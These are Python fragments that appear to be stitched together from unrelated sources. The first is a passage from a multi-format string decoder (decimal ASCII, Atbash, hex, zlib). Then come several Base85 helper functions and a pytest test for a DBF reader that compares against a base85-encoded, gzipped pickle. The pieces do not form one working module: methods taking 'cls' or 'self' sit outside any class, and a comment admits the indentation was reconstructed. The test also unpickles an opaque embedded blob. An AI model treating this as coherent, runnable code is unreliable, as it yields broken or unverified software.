                decode_str = ''.join(tmp_bin_list)
            else:
                return False, raw_encode_str
        elif decode_method == 'decimal_ascii':
            if len(encode_str) < 4:
                return False, raw_encode_str
            encode_str = encode_str.replace(' ', '').strip()
            rex = re.compile('^[0-9]+$', re.MULTILINE)
            if not self.regex_match(rex, encode_str):
                return False, raw_encode_str
            # ASCII string: decimal values max out at 127, so greedily take
            # 3 digits and fall back to 2 when the value would exceed it.
            tmp_list = list(encode_str)
            ascii_list = []
            while len(tmp_list) > 0:
                tmp_str = ''.join(tmp_list[:3])
                if int(tmp_str) > 127:
                    tmp_str = ''.join(tmp_list[:2])
                    tmp_list = tmp_list[2:]
                else:
                    tmp_list = tmp_list[3:]
                ascii_list.append(chr(int(tmp_str)))
            decode_str = ''.join(ascii_list)
        elif decode_method in ['switch_case', 'reverse_alphabet', 'reverse']:
            # Without this guard these self-inverse transforms would recurse
            # forever.
            if len(m_list) > 0 and m_list[-1] in ['switch_case', 'reverse_alphabet', 'reverse']:
                return False, raw_encode_str
            # The input must contain at least one ASCII letter.
            tmp_data = [t for t in encode_str if t in string.ascii_letters]
            if len(tmp_data) <= 0:
                return False, raw_encode_str
            # rex = re.compile('^[A-Za-z0-9+/=]$', re.MULTILINE)
            # if not self.regex_match(rex, encode_str):
            #     return False, raw_encode_str
            if decode_method == 'switch_case':
                new_data = []
                for t in encode_str:
                    if t in string.ascii_lowercase:
                        t = t.upper()
                    elif t in string.ascii_uppercase:
                        t = t.lower()
                    new_data.append(t)
                decode_str = ''.join(new_data)
            elif decode_method == 'reverse_alphabet':
                # Atbash-style mirror: a->z, z->a (case preserved).
                new_data = []
                for t in encode_str:
                    if t in string.ascii_letters:
                        if t in string.ascii_lowercase:
                            t = ord(t) + (25 - (ord(t) - ord('a')) * 2)
                            t = chr(t)
                        else:
                            t = ord(t) + (25 - (ord(t) - ord('A')) * 2)
                            t = chr(t)
                    new_data.append(t)
                decode_str = ''.join(new_data)
            elif decode_method == 'reverse':
                # Reverse the whole string.
                decode_str = encode_str[::-1]
            else:
                return False, raw_encode_str
        elif decode_method == 'urlencode':
            if len(encode_str) < 4:
                return False, raw_encode_str
            decode_str = unquote_plus(encode_str)
        elif decode_method == 'hex':
            if len(encode_str) < 4:
                return False, raw_encode_str
            encode_str = encode_str.lower()
            rex = re.compile('^[a-f0-9]+$', re.MULTILINE)
            if self.regex_match(rex, encode_str.lower()):
                # Fix up odd-length hex data by appending a '0'.
                if len(encode_str) % 2 != 0:
                    encode_str += '0'
                decode_str = hex2str(encode_str)
            else:
                return False, raw_encode_str
        elif decode_method == 'zlib':
            if len(encode_str) < 4:
                return False, raw_encode_str
            try:
                decode_str = zlib.decompress(utf8(encode_str))
            except:
                # Not a zlib stream.
                return False, raw_encode_str
        else:
            # Fall back to treating decode_method as a codec name.
            decode_str = encode_str.decode(decode_method)
        # Post-checks: reject empty results and no-op decodes (output equal
        # to input).
        # NOTE(review): indentation reconstructed — these checks appear to
        # run after the method dispatch above; confirm against upstream.
        if len(decode_str) <= 0:
            return False, raw_encode_str
        elif utf8(encode_str) == utf8(decode_str):
            return False, raw_encode_str
        else:
            # Decoded content is only considered valid when it is (mostly)
            # printable characters.
            if self.only_printable:
                decode_str = to_unicode(decode_str)
                if isinstance(decode_str, bytes):
                    return False, raw_encode_str
                tmp_decode_str = list(decode_str)
                printable_count = 0
                for t in tmp_decode_str:
                    if str(t) in string.printable:
                        printable_count += 1
                # Below the printable-ratio threshold the decode is deemed a
                # failure.
                if printable_count * 1.0 / len(tmp_decode_str) < self.printable_percent:
                    return False, raw_encode_str
        return True, decode_str
    except Exception as e:
        if self.verbose:
            logger.exception(e)
        return False, raw_encode_str
def decode(cls, value):
    """Decode a Base85 payload to raw bytes; str input is UTF-8-encoded first."""
    raw = value if isinstance(value, bytes) else value.encode()
    return base64.b85decode(raw)
def get_file_hash(self, name):
    """Return the recorded hash of *name* as a big-endian int, or 0 if absent.

    Stored hashes live in self.file_data as base85 strings.
    """
    encoded = self.file_data.get(name, None)
    if encoded is None:
        return 0
    digest = base64.b85decode(encoded)
    return int.from_bytes(digest, byteorder='big')
def base85decode(str, coding = 'utf8'):
    """Decode a Base85 value and return it as text in *coding*.

    Accepts either text (encoded to bytes with *coding* first) or raw
    bytes/bytearray. Fix: the original only assigned the intermediate
    variable inside the str branch, so bytes input raised NameError;
    bytes-like input is now decoded directly. (Parameter name `str` is kept
    for backward compatibility with keyword callers, though it shadows the
    builtin.)
    """
    if isinstance(str, (bytes, bytearray)):
        data = bytes(str)
    else:
        data = str.encode(coding)
    return base64.b85decode(data).decode(coding)
def test_dbf_reader():
    """Load US-STATES.dbf and compare it against a pickled reference DataFrame.

    The reference frame is embedded below as a base85-encoded, gzip-compressed
    pickle. Verifies the field names and the preserve_order /
    strip_whitespace options of load_dataframe().
    """
    from .. import DBF
    from .. import data_warehouse
    q = DBF(data_warehouse.example_file('US-STATES.dbf'))
    assert q.fieldnames() == [
        'STATEFP', 'STATENS', 'AFFGEOID', 'GEOID', 'STUSPS', 'NAME', 'LSAD', 'ALAND', 'AWATER',
    ]
    df = q.load_dataframe(preserve_order=False, strip_whitespace=False)
    # base85(gzip(pickle(reference DataFrame))).
    correct = b'ABzY8<${%50{^v}dwdkt^}s_!9zhTV6cBJlk*FB=HM6sbNXP@i=EWu?0gUNnGs!O5?B<-EC4?Fg6%a&4#cB}W7GJGeA4P=<ilV4h#' \
        b'EMT8pA{dKpS8czTHD?`bMMW~w7-9T?d0Q!^F8O@x#!+9=iWIJCzl)*>(o;%dZr+jMx&q=^$sJiSU2@jiy-HWl`x<Oa`PLG&dJGXY9' \
        b'TGq|B^(?G%%$nGX))bN^dhTlQ%n=j<r|VS{@7}LmZvo2!rw+*R>eSj7&kZo-y*8Qbt!(8MWlW;QzZD>oKGUhUPa6BongclNU>6J37' \
        b'1V{vFw*na~mS?z|>6V(C=I#B9vWgJE{BJTkP^3dclpR>AP10nIRC4ICSVk@=AUk)f;LIM%Vn?CvBHIKCm5II7ZMR3s-dU=56p!kGN' \
        b'XQ4Ir#^&&W-va)jCKgf^uPvm?PPHbM=2xIMd6_yuP7Q?uPL6qwYYfGXqzF{y?YHEp6S`8=lX_YlFp<xK^SXw%#q^hhKCR$_IJjoiP' \
        b'rglM1bq$<st-Z3aq69n^me&*(!zqRdlbbC)MeZG(TA5u9r$u2({NG2EtkS?lj0DwGgDkSA_rTQrcwT&1+=@<qoP_3#D4a<{qpgCo;' \
        b'&wC=8cegJads36cr<3fIsK!NV}iGN?d+Yjk^OMYW%4K{2QqmylY^KX%;XRzhccPR<S-_WVRAT=BbYpv$&pMR$K>%$j$(2&lVg}Xfy' \
        b'on@9LwZ5CdV^*5|a~{oXF%PCQoM4!{jMUPG<5{CQoB>3X`WZIhDzLCeL8<OeW7_avGCoGg-joIZS$)^fBpYGQebzNrg$3$q<v^Gr`' \
        b'{+w{j{Fg`m+0N<L2$m8MB33K~t5+=#Xs!tsK&vo9exw`<Ea>u4<Qs9idNCP~lpy(@}|zBxZvr?HvtTlZZfo$vNLSIngMv%B{znj1?' \
        b';@1I6<WmdM+y5(2Q3T>k?>zc9bLz*+m8~*qvT}xHGdpV71)8ZYQ=)Jr4*aHtz{jj#Yg0}aTef=)Ysjkag2htcExOGQ_-mCg&-hZy1' \
        b'$RD+Zf!RcUk-02QbI=&_{gg5y?|g6gW*Y0Qvu|jmvK}Y>K=1j~>%a2Q+*$N(=~f!+a|3_gK>b`3JaRSl^X}&PD`@WRZC$>8I+2YV_' \
        b'E;&J?A|z%u4~%xH4QWus&2gUHJV$+=I{}8+#h$W>80a-T07@4I*+sWB*xM8p84@Ells5^sz++*J-xJdR4et<`_wl}=sI>^ckz6hbB' \
        b'~r!xtr$bz7vjo6ejYso?C9Ce$UOh>j1UyoxWn-EktGy=30Im=RbQq&8a8r|8y^%&z8JaD@C8U@N_Gc!?T~Zw!}LpzIq(J58L)8Cev' \
        b'}%ku%Pt_I-ytAEt6w-JxA{zFS_&E2VnT5hY3Gj6E0DP`NES!P@fG*&D}GShQro(=-m_UOsX)wSRE?cR=k6gT0HXe(kWCv#kB|&3V;' \
        b'SZu(@#?X-PyRdL+9KhKtaN$oFQ(epW#ZDWTlr*ix1iEmi*S~ASq0zd8#4x-mhzGv(ns=sh**GtxUv2<1ewO_U6Qp>)fE_eskS8mN(' \
        b'>pB<>SX+4C?!zf64}Je-1(gqMhbgq*mEZ2Hq-WAYJ9TUR@wZ}Y=>7O%_nhr?UFCNTypQ&q_VzA~#{KbF$wu1mqQ!4n>v^iB+VV5C?' \
        b'yt+~dfMMPIGN^i=e*Zr^!iP&6<YDw`0^)}wBPz#eZ6%)-ZV5t`>*sj{EfEX{LH$qY5&84QTypxIe6d0)>fTz==IT7yxwoUz}mOdO*' \
        b'priZ`2udqn;OqnRKHLrW^JA_!#oInw4)I>s}ue+Te%THUy!_1_g?3P@%*I4N7eY!yF5IUYKix56Wx^z&slih}fV)xeXzxut9@L8^T' \
        b'a!f!_<&HUwe54Izlyph1lV0WZ|r;D-e^1fk9b1?p|kpuvKm7Z%#!heb9hu-FC_F0dgCjTR_gxX^|mG})lSPb^Tqpj!~~L$f_+Kg8^' \
        b'b`JlxHKNvOypw$Ki+H6oEZbKLn_6&Wn#D)O0+n_?yh7fev5QdaJLm#AV2tua~ApjdRKzph_$k-47(*^~y_T*JqYC{;h>{V#6%&IuN' \
        b'zECI}3MtUdRZUUIl$Oh_A^54SdcCUV)fBi$Zq=YiR>N?yq-tJRA*(*PgsWbEK=Z>&p(+8A7?;YO{cxGA2H<j84Z<omt6)%5NKUSnT' \
        b'NPNtTQ#3XvhfPu>I;TR!mMSjs_NHB0<4p+4SV5A)*4bnVKR;Na%%vtl2rw+W}UTgNFf<`jocc74NUcU{hAVjYvooAu9MX;Trb~+AZ' \
        b'%o6P*K8K7;fn6tdV{CGg(#OMp+HPO-v;{Lu7aN%B>n~VsrL~gF$i!Z<a%+!e*wb{;(1Zz%6oX2yW$}^QvKz*tf~8VYpphkq_>WRX^' \
        b'M*t3kL+R#mv0sbtD3IWB(ARZR(!NN(YgR1_as;5|(B`@$Lt`@KvJ_!TV_fcxb2`rv+94Zs7k8iZfSstUi9L#M!la%&hKl3K~R_i)2' \
        b'7>$LRJp9M9<*RLEFKRn{F1mRJKMS;g078M?MSTy*x!xDzA{VilZPdF?-c+z1Bz*7#30^1xG6}CGpA^45MqQTP+OBi<aw~+IEr^6D2' \
        b'XB?IgJnOJ%u&cj?ocYf=EPi<2VF|)+hed%G92N~;>~A3th&>LAA6{};6nNQTQQ;MbB@DmqZy`^UR~?ohyymc|u(!X3JZN6;Zy`^de' \
        b'U3Q$;SEQ`eDFJm#Sd>fECJZ>uqg1B!=l354oeu`am3IE?>a02c+X)`;eCfC1P2_JFnr*Mp$|TESb}iSVF|%U4vPjKJEH1?PaKv2eC' \
        b'n_$@R=j>Dtzv+gyHv&d!fM>yk0uQ>!mMwz4R5Ym%irp(l@+b`U9_*zUB4OVO}r&53iTL<Mq-XdA;;Kub2MB>!ttY_0pety>x`vOMl' \
        b'_@(qDPK^aHP#{>JO2A9=m>cU~|3gVjq&-_KdegaZWoF;}pHM+sJOpx`hb%~|o{Ai+T#ELg=MoK-Il<s9;39%r8)hjI4%@EE~<94<J' \
        b'3BLpjWtY8&K3J&9OoC7{QUT^?M3085m;1G@x9L5vGx_o$|;2@3_9KvyeH5@P2=);o)2XKO51t*HNt2jw;7*7^)(9pxVupCbj9Kp$g' \
        b'7vZUbqj(zUqC%V^xC&1fT#HjV7nfkZ;37PO^PECFlk?m%Jd1N#F-{X)j%N$5!~(&Ecn;@C4SG3O6r)dYCHe)|U_fv!202&Op(1!5s' \
        b')8#pB)Awg&Q%c%bFMDL>6~kd@La*gID_+oT0D<)T`kV!TwjOh3tot`L~LuYP>dhN*_=zuu}G|UAr^BkFT@hDt`aO2T!?c7m*HH&Ra' \
        b'hq0Rf6*b&&7z~g;*}Q2rI<e=VGPcC{}TfmSHvL+De=+xB;VL?S)t))?0|Rg3EA$$cF`3C+1m=_2Swxq`$&xXrb{*>dktG?s4-67fR' \
        b'kT?e04B;3DA-6U);nm)Ewq&s)2m%IFzay<Nb)73s-DYZ_At7ng^P!dp6-M!hBN>e?>s^Oi~(F*6a%n(ldP;@*mlq~4{Y;p*CcBD^I' \
        b'sCMII0C*A5HQO$NV|M%}8>fGBLBaLkdmv=xj_coWrF_Cb2cgMK5vKBp__PFe=MR-dl6RC8<-Q8^nZ>g4q?)J&mD!iq;Tt1VDw>IuA' \
        b';`%8`yv4b<3LU$XdaA`$ZwcWoK~Anr+H^CVxTMcpCPV-0>~wF_VY~2_PMNOfWRiQUG?wZuZdVE&ecrk}^9;-w-7b1d$=)iAWr>)J#' \
        b'}}rBw=|k@PqE(aVp?J+_g2-OB*(J51tkLaR&AtGneOCL-NiZxk$bC2XGtWBbWD?HflK}{)8CuR_s!(q7MOb6^=Ckqd#f|BgB&OBdR' \
        b'xl9)f*YpQ<or>kb7x@UBX*;x+9Tlb9Zga#9N2;?T4Q7)aV^)w{o&u?6<6eX4(^V^XS6m+*>Jm=}5Tz5Wt^`y2MDC*;sqGtKKf+-pb' \
        b'S2M8@SB4}1EmphU`Wdv{;l=Pi@bWASXpFip1#JzUXO1;yftHnIcUT-zmb&6Uogt8Y2DvaeETMz?=sf|ts5$y~joGZRm^_BxE0$=(*' \
        b'GvE9|RUEaS6a{1Z4N>oAdgxjyC9$YQFq0yF3x$JEX_ZE$(TMSQG#?7}Xyn=hHHRu~v#&GlW!nJ+gmbv|E>cMrQ3Uaq3vAta>>Jpvo' \
        b'>r|WRW~ShJ;VqG&-|QybOiR2<{GKbTceuXauI~H&WCy8Uy9_-^j+At($BY{u>wGaV<*CrodaT<U<o}&ac#WvcQwh^(@zj{QX=GR#`' \
        b'=5^fFWxrr|2N?E;<XZAC-L<XZ<P23iGL>XjS}A^aj(RiB)(bV%@W@t@vRcyCh_eO-y!jx65l29-4g#?;w=*2Bk{cw-zV|?5<ejEFC' \
        b'_k@#1BgRki-v5{40qck@!)GACvfTiGMBeR*9dG_(_SMl6afM+a>;u#7|4SL*kthKO^z867Q1uIf<W_c(=qaNc<vU!^AyAG#ich5|R' \
        b'1w!SNwI__BrkOLu&QsPPeN@V7)p@m1PLzhz#9uhE7vYa4N|b-}p!crxDWbUf>0XxwLA@CNN=jr+U)<G#tp-EVb!i;X*Y6~4{KeaE`' \
        b'sr1*sR#Q3E6$#GBo6yo9CJ`e9%m%dL|(t`)+;^+sT-U45+z=t2uZ>sS_I)?S-zrM`K;6Xa}Agfz5{Zot#enc#d_%ZF)gP&NvY3ouw' \
        b'nI-){rTsPQi>8h?Y$BIr@H1kIHD?n^Gm*;VWs-@Qk%ylXV<ab%8yT<$e{W6e3-WKa2M^I9mssP>TtY8hVs*`p45eMaw7PypyBgVyi' \
        b'C@#jS<`JYyF2k4x~8G*uQ{y0K*2w7Q&Wdw>eP<kT1z-g2Wc+&Cvbvda<?)700'
    # NOTE: pickle.loads on trusted, in-repo test data only.
    correct_df = pickle.loads(gzip.decompress(base64.b85decode(correct)))
    pandas.testing.assert_frame_equal(correct_df, df)
    # preserve_order=True must keep the on-disk column order.
    df_o = q.load_dataframe(preserve_order=True, strip_whitespace=False)
    pandas.testing.assert_frame_equal(correct_df[[
        'STATEFP', 'STATENS', 'AFFGEOID', 'GEOID', 'STUSPS', 'NAME', 'LSAD', 'ALAND', 'AWATER',
    ]], df_o)
    # strip_whitespace=True should match the reference with NAME stripped.
    df_s = q.load_dataframe(preserve_order=False, strip_whitespace=True)
    correct_df.NAME = correct_df.NAME.str.strip()
    pandas.testing.assert_frame_equal(correct_df, df_s)